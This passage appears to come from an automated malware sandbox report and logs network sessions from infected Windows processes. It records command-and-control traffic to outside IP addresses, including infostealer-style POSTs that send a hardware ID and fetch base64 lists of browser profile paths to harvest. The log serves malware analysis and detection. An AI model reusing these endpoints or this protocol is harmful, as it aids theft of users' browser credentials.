                                                                                                                                                                                                                                Data Ascii: plfACj*BT?Bk"w5/5bitbucket.org#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.486641884 CEST156INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                content-length: 11
                                                                                                                                                                                                                                content-type: text/plain
                                                                                                                                                                                                                                date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                Data Ascii: Bad Request


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.949719176.111.174.109806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.115081072 CEST196OUTGET /kurwa HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 176.111.174.109
                                                                                                                                                                                                                                Cache-Control: no-cache


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.949720162.241.61.218806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.198754072 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee af 14 09 17 44 0c 10 e7 e8 2c 03 b9 a3 df 19 e1 df 0c 76 39 85 89 7c 73 24 ac 9d 63 6f 6a 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e
                                                                                                                                                                                                                                Data Ascii: njfD,v9|s$coj5/3nerv.com.pe#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.693106890 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.949721162.241.61.218806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.208450079 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee af 14 3d fd 1e bf f7 65 8b aa d6 82 e4 40 3d 82 21 20 d9 3d 98 17 3c e3 ce 81 23 e3 96 f3 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e
                                                                                                                                                                                                                                Data Ascii: njf=e@=! =<#5/3nerv.com.pe#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.709856033 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.94973841.216.188.190806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:01.538203001 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 561
                                                                                                                                                                                                                                Host: 41.216.188.190
                                                                                                                                                                                                                                Sep 21, 2024 13:34:01.538255930 CEST561OUTData Raw: 64 61 74 61 3d 52 6d 57 51 4d 34 74 55 74 30 56 33 78 75 7a 54 50 6c 67 79 4a 6c 42 34 6f 4c 6d 45 31 46 49 58 31 6d 36 54 37 32 68 52 77 6b 4d 72 6f 64 75 47 2d 37 61 42 54 6c 39 56 6c 31 76 6c 76 36 63 68 68 76 39 38 54 67 74 5a 62 34 47 75 54
                                                                                                                                                                                                                                Data Ascii: data=RmWQM4tUt0V3xuzTPlgyJlB4oLmE1FIX1m6T72hRwkMroduG-7aBTl9Vl1vlv6chhv98TgtZb4GuT-UkGVkWBaQTvh85qfScFjatPqr7WJqyh5Pej_ib4cjKe6f3i3TVAznU1JFbcgID73VjwYSxNzDXiMvtzqDUfnktYnoveBkAehZC-61nEYsD5XBUvsZ8dHIIFy2vjYxqcUkIIlREESkNcqLNdo-h2yYn8P1jHjWly9
                                                                                                                                                                                                                                Sep 21, 2024 13:34:03.752053022 CEST363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:02 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 108
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 71 6b 53 70 4b 77 49 33 78 6f 62 47 4d 30 65 61 73 6b 4a 51 7a 58 43 62 4a 62 77 47 6b 6d 50 2f 51 59 43 73 49 52 52 45 70 63 37 39 6e 6c 65 36 57 4a 51 63 63 6b 65 78 64 54 32 33 70 7a 4e 61 57 47 62 49 49 42 39 6f 4a 7a 72 49 50 4f 72 2f 72 38 63 58 6c 45 67 50 37 32 42 2b 4c 30 34 6f 72 6b 75 4e 34 5a 55 6b 55 72 67 3d
                                                                                                                                                                                                                                Data Ascii: qkSpKwI3xobGM0easkJQzXCbJbwGkmP/QYCsIRREpc79nle6WJQcckexdT23pzNaWGbIIB9oJzrIPOr/r8cXlEgP72B+L04orkuN4ZUkUrg=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.94974092.119.114.169802624C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:07.514650106 CEST36INData Raw: ad da ba ab 18 00 00 00 12 27 00 00 4b 4e 08 2d 4d 4e 2f 49 28 3c 1f 4e 1a 4f 03 3e 0a 49 03 03 20 0a 0a 4f
                                                                                                                                                                                                                                Data Ascii: 'KN-MN/I(<NO>I O
                                                                                                                                                                                                                                Sep 21, 2024 13:34:07.762882948 CEST36INData Raw: ad da ba ab 18 00 00 00 12 27 00 00 4b 4e 08 2d 4d 4e 2f 49 28 3c 1f 4e 1a 4f 03 3e 0a 49 03 03 20 0a 0a 4f
                                                                                                                                                                                                                                Data Ascii: 'KN-MN/I(<NO>I O
                                                                                                                                                                                                                                Sep 21, 2024 13:34:10.625389099 CEST12OUTData Raw: ad da ba ab 00 00 00 00 10 27 00 00
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:10.799762964 CEST12INData Raw: ad da ba ab 00 00 00 00 11 27 00 00
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.459377050 CEST18OUTData Raw: ad da ba ab 06 00 00 00 16 27 00 00 1a 15 10 1c 17 0d
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.654424906 CEST76INData Raw: ad da ba ab 40 00 00 00 17 27 00 00 1b 48 4c 1b 1d 1b 49 18 4d 1d 4e 1f 4b 4f 4c 1a 1f 4d 1c 1d 4e 1a 4d 4f 4f 4f 41 1f 4d 1a 18 4b 4d 4e 4a 4d 4e 1a 18 4b 1a 1c 4d 18 4e 4f 41 40 1a 1b 41 1d 1b 1b 4b 4c 41 4f 4a 1f 4b 40 4d 18
                                                                                                                                                                                                                                Data Ascii: @'HLIMNKOLMNMOOOAMKMNJMNKMNOA@AKLAOJK@M
                                                                                                                                                                                                                                Sep 21, 2024 13:34:15.833296061 CEST18OUTData Raw: ad da ba ab 06 00 00 00 18 27 00 00 1a 15 10 1c 17 0d
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.082761049 CEST14INData Raw: ad da ba ab 02 00 00 00 13 27 00 00 4f 49
                                                                                                                                                                                                                                Data Ascii: 'OI
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.100346088 CEST1236INData Raw: ad da ba ab 54 36 0e 00 19 27 00 00 0a a3 95 84 0e 39 6a b2 8e 47 f7 b6 17 31 3b 96 2c d0 5b f1 f9 0d 69 2d ed d3 f9 4d 50 5b 73 33 f9 79 e8 6b 35 7b f3 27 6c 95 84 a3 6c 42 0f 95 c4 6e c9 8e a7 c8 d9 a1 6c 02 c2 af 96 e0 b0 fd ff d9 8e c7 07 96
                                                                                                                                                                                                                                Data Ascii: T6'9jG1;,[i-MP[s3yk5{'llBnlFU$([w;1|;nr9m(k=+;A"[imm;0(C]_C&P+t<Q+<M8;hqJrLa4?1pFE=v{?Z2*N
                                                                                                                                                                                                                                Sep 21, 2024 13:34:16.100452900 CEST1236INData Raw: 7c 32 02 9b 21 30 33 2b eb f4 f6 86 27 33 bb 83 74 47 ba f8 ca 72 5d 34 1f 1f 30 58 60 9a b1 f4 42 df 51 70 6a 08 d3 a5 48 ba 28 15 99 41 cc 47 de da c9 4a 1b 30 4b e9 ec a8 95 b6 60 b4 31 b5 47 34 42 df c9 2c 5f 1a 32 65 dc 54 b7 0a d3 10 3f ff
                                                                                                                                                                                                                                Data Ascii: |2!03+'3tGr]40X`BQpjH(AGJ0K`1G4B,_2eT?0K?SKSBQoAB?0K#@Zm`d*=:?RevMZ]!`h2Tm`d*=:?be\iMZ]B `h2Tl`d*=:?"e\eMZ] `h2P3XdzMZ] `h2oP3


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.94974146.8.231.109806524C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:12.387531996 CEST87OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:34:12.945743084 CEST203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:12 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Sep 21, 2024 13:34:13.262964964 CEST413OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 214
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 43 45 31 36 43 46 45 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="hwid"C71CE16CFE534228319403------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="build"default------ECFHJKEBAAECBFHIECGI--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.150192976 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:13 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Length: 180
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 5a 47 46 6b 59 54 52 68 5a 44 64 6a 4f 54 67 35 5a 54 55 35 59 7a 59 7a 59 32 46 6b 4f 47 4d 78 5a 47 55 77 5a 6a 63 79 4e 47 45 78 5a 6d 51 33 59 6d 52 6d 4d 44 64 6b 5a 6d 4d 31 4e 54 41 30 4e 44 55 32 4d 54 46 6c 5a 44 51 30 4d 47 55 31 4d 44 63 35 5a 6a 6c 6b 4e 6a 67 78 59 6d 49 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                Data Ascii: ZGFkYTRhZDdjOTg5ZTU5YzYzY2FkOGMxZGUwZjcyNGExZmQ3YmRmMDdkZmM1NTA0NDU2MTFlZDQ0MGU1MDc5ZjlkNjgxYmIwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.372612953 CEST467OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="message"browsers------KFHJJDHJEGHJKECBGCFH--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.554877996 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:14 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Length: 1520
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.554914951 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                                                                                                Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.793608904 CEST466OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"plugins------BKFBAKFCBFHIJJJJDBFC--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:14.978161097 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:14 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Length: 7116
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
